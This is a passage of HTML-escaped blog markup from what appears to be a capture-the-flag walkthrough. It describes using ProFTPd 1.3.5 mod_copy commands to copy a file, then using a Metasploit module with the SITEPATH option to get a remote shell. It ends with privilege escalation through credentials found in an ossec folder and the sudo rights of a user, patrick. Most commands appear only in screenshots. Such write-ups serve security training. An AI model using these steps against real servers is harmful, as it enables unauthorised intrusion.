inside:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkR7V-nXpJtyIhjUA5nUXq2WwJ09Odq8VR-mNZKjOjPkZGIXMnPmRSCr_TFNl2pvehWxon9DBzgymq46_qIHLxlsffZ0hAz21j9R8fe0-p8Ig3-Yo_EaYNm3BLiiEiA3tYF7imsgWANlm_/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;508&quot; data-original-width=&quot;903&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkR7V-nXpJtyIhjUA5nUXq2WwJ09Odq8VR-mNZKjOjPkZGIXMnPmRSCr_TFNl2pvehWxon9DBzgymq46_qIHLxlsffZ0hAz21j9R8fe0-p8Ig3-Yo_EaYNm3BLiiEiA3tYF7imsgWANlm_/s16000/screenshot.36.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;- However let&#39;s focus our attention on the file &lt;/span&gt;&lt;b&gt;version_control&lt;/b&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrSCVuirr8FgJeomd6DkxF27uySYvxPIJutxYKDaaAIJ6AwA_vIX8iqqThCPCp4DwJND6gCAEB6xPsCIjYKjLKb_dP2JCYaZQM5ElVf8yFx4RzcuTRpHWynMfzXkhw0TxUueNLRR5prc5W/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;461&quot; data-original-width=&quot;945&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrSCVuirr8FgJeomd6DkxF27uySYvxPIJutxYKDaaAIJ6AwA_vIX8iqqThCPCp4DwJND6gCAEB6xPsCIjYKjLKb_dP2JCYaZQM5ElVf8yFx4RzcuTRpHWynMfzXkhw0TxUueNLRR5prc5W/s16000/screenshot.37.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;- At this moment the file is not accessible, so we need to copy it to the folder &lt;b&gt;/upload&lt;/b&gt; ,what it&#39;s doable because it has read and write permissions.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Using commands &lt;b&gt;site cpfr&lt;/b&gt; and &lt;b&gt;site cpto&lt;/b&gt; to copy&amp;nbsp;&lt;b&gt;version_control:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;http://www.proftpd.org/docs/contrib/mod_copy.html&quot;&gt;http://www.proftpd.org/docs/contrib/mod_copy.html&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDLuPcBxhmis25TpQZTM7osYLSeB402NLJ4Lub5cuQz0Jl7cGlB7c8fOTEOD76a9bROWZSCcNpKrjH0hs1mYOBNXro4sdtY82dkPXYDJZYyCgh300jBMAetotNUAog8sZO82QI18ZR6tYf/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;213&quot; data-original-width=&quot;649&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDLuPcBxhmis25TpQZTM7osYLSeB402NLJ4Lub5cuQz0Jl7cGlB7c8fOTEOD76a9bROWZSCcNpKrjH0hs1mYOBNXro4sdtY82dkPXYDJZYyCgh300jBMAetotNUAog8sZO82QI18ZR6tYf/s16000/screenshot.41.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Copying &lt;b&gt;version_control&lt;/b&gt; to &lt;b&gt;/upload&lt;/b&gt; has been successful:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVUl6PjwnpxgzIR_kh1TucrqFUm6pfuao9BTOjDHLuj-VixjwTmPII152TWqqeDY8c9ROgQVSM81AYNZiXgX1HE-wjYdStqUp4KjiiWpjJ82y-CUR4xs29yZt7eUjeC1qkjbm_R2KVQdsk/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;736&quot; data-original-width=&quot;826&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVUl6PjwnpxgzIR_kh1TucrqFUm6pfuao9BTOjDHLuj-VixjwTmPII152TWqqeDY8c9ROgQVSM81AYNZiXgX1HE-wjYdStqUp4KjiiWpjJ82y-CUR4xs29yZt7eUjeC1qkjbm_R2KVQdsk/s16000/screenshot.42.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting &lt;b&gt;version_control&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmjb4P18ornNNxHj2p9ctw3qIzCVBgly98YDCni5LR8Dg0Hujg6MAscrqivfNxSSMjXBQxGGm69sk2HKXprkB471abTXpplW5jM1p1csSRhBKaSZCodOUQkpRw40k_1fmnVms-Xgp6PXB9/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;142&quot; data-original-width=&quot;797&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmjb4P18ornNNxHj2p9ctw3qIzCVBgly98YDCni5LR8Dg0Hujg6MAscrqivfNxSSMjXBQxGGm69sk2HKXprkB471abTXpplW5jM1p1csSRhBKaSZCodOUQkpRw40k_1fmnVms-Xgp6PXB9/s16000/screenshot.43.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading the file we discover some potential vulnerabilities regarding &lt;b&gt;ProFTPd version 1.3.5. &lt;/b&gt;Also the new webroot is &lt;b&gt;/var/www/tryingharderisjoy&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41yTkEBqXLgZ71mjXDaKFsjuFcECdGSdsg8kbJeFlmqDCbOLEWWOkLk209Ag10t_sDNfpfYTc6HdReg8RtDwwiAyCO4UNuhC5HKUj1_geYRLdZaoGEfgsu678o4DQWTc4Acm8DYnU6yOb/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;299&quot; data-original-width=&quot;1022&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41yTkEBqXLgZ71mjXDaKFsjuFcECdGSdsg8kbJeFlmqDCbOLEWWOkLk209Ag10t_sDNfpfYTc6HdReg8RtDwwiAyCO4UNuhC5HKUj1_geYRLdZaoGEfgsu678o4DQWTc4Acm8DYnU6yOb/s16000/screenshot.44.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Msfconsole searchs for exploits:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_RIiQ17YdeupFElfKj7kHPm6ZlYFFokTbZxkGqevCAcbTMERsH1yrUpJboOU57gcg1mvTKqWf8QBvq0cQwne9w1mqR3M3SBsUPwHn6PKqr3MlR3CHhv0LhKOhAyGZN__551vhqHG3V8B/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;354&quot; data-original-width=&quot;1473&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_RIiQ17YdeupFElfKj7kHPm6ZlYFFokTbZxkGqevCAcbTMERsH1yrUpJboOU57gcg1mvTKqWf8QBvq0cQwne9w1mqR3M3SBsUPwHn6PKqr3MlR3CHhv0LhKOhAyGZN__551vhqHG3V8B/s16000/screenshot.45.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;- Setting option &lt;b&gt;SITEPATH&lt;/b&gt; as the new webroot&amp;nbsp;&lt;/span&gt;&lt;b&gt;/var/www/tryingharderisjoy:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZkOOUVLTJB2b9R9avpYy-HaOR-zTWAUyXZ6vlZGH8lBGW2tPRn6MNJa7oJ_DpGhn3NmLirnLi-iw5Ym0Xx-PeCPryMLW7bERq6ML4JWhHo41w6Ea2czgjrAM3tJqogu3kBXjm2qHyGmRc/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;384&quot; data-original-width=&quot;945&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZkOOUVLTJB2b9R9avpYy-HaOR-zTWAUyXZ6vlZGH8lBGW2tPRn6MNJa7oJ_DpGhn3NmLirnLi-iw5Ym0Xx-PeCPryMLW7bERq6ML4JWhHo41w6Ea2czgjrAM3tJqogu3kBXjm2qHyGmRc/s16000/screenshot.19.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So finally we have a remote shell.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing around some content:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq26t2NhBsUk4m1f9Bokbc3aDpFxpalrfCR2C1ta_bzWskPInZJ4NzquvvQJcpdiTLhiub6yR7LCM_WqotXcEu8vrvuXxcet0GH3A6qTr01kCGtkGO_rofWd9Hk05MOW0R8aXanXqmw1CH/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;658&quot; data-original-width=&quot;790&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq26t2NhBsUk4m1f9Bokbc3aDpFxpalrfCR2C1ta_bzWskPInZJ4NzquvvQJcpdiTLhiub6yR7LCM_WqotXcEu8vrvuXxcet0GH3A6qTr01kCGtkGO_rofWd9Hk05MOW0R8aXanXqmw1CH/s16000/screenshot.20.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Inside folder &lt;b&gt;ossec&lt;/b&gt; we find essential credentials:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhzljht1-RSCxel_bK7eZe68QXdwx94jD-1_3pBiZGngChrhX7G7NJVOjx8dJZvwQvfuAnnJzZ_Ykb34WXeyWJh5KKGSOghILC3K0Mio2g87dPD6atjjW4yNFr2unfv8klJInGy83XY322/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;115&quot; data-original-width=&quot;806&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhzljht1-RSCxel_bK7eZe68QXdwx94jD-1_3pBiZGngChrhX7G7NJVOjx8dJZvwQvfuAnnJzZ_Ykb34WXeyWJh5KKGSOghILC3K0Mio2g87dPD6atjjW4yNFr2unfv8klJInGy83XY322/s16000/screenshot.21.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Switching to&lt;b&gt; root&lt;/b&gt; does not work:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5vDEOACI3QGTVXtl5mVMepw73_ZZf5T6DvrTKEtn3b-uu8I5YU9aNCqzBl6muznH8l3WK10XvbEUmHon9b7j7PB9VaI3UonytaFmKJSuos3kikZORi45zXiSy4NSP93DhKNXvQccrIbZR/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;118&quot; data-original-width=&quot;624&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5vDEOACI3QGTVXtl5mVMepw73_ZZf5T6DvrTKEtn3b-uu8I5YU9aNCqzBl6muznH8l3WK10XvbEUmHon9b7j7PB9VaI3UonytaFmKJSuos3kikZORi45zXiSy4NSP93DhKNXvQccrIbZR/s16000/screenshot.22.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However switching to &lt;b&gt;patrick&lt;/b&gt; works, and this user has some sudoer privileges on the file &lt;b&gt;test&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWKXSX6i7xvT09VufqmEorzQKBhdvCIE9MhVzztdw1cAt-V3Ry3_Vdkbt-u9zgfrAudRLJGv5CJmrU_Y7zPHRTAU3YKlnedY7qRMP6aDSu-lkbVhDhCH9AzXTS5L6POAgZElBO9DziwP38/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;276&quot; data-original-width=&quot;895&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWKXSX6i7xvT09VufqmEorzQKBhdvCIE9MhVzztdw1cAt-V3Ry3_Vdkbt-u9zgfrAudRLJGv5CJmrU_Y7zPHRTAU3YKlnedY7qRMP6aDSu-lkbVhDhCH9AzXTS5L6POAgZElBO9DziwP38/s16000/screenshot.23.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: 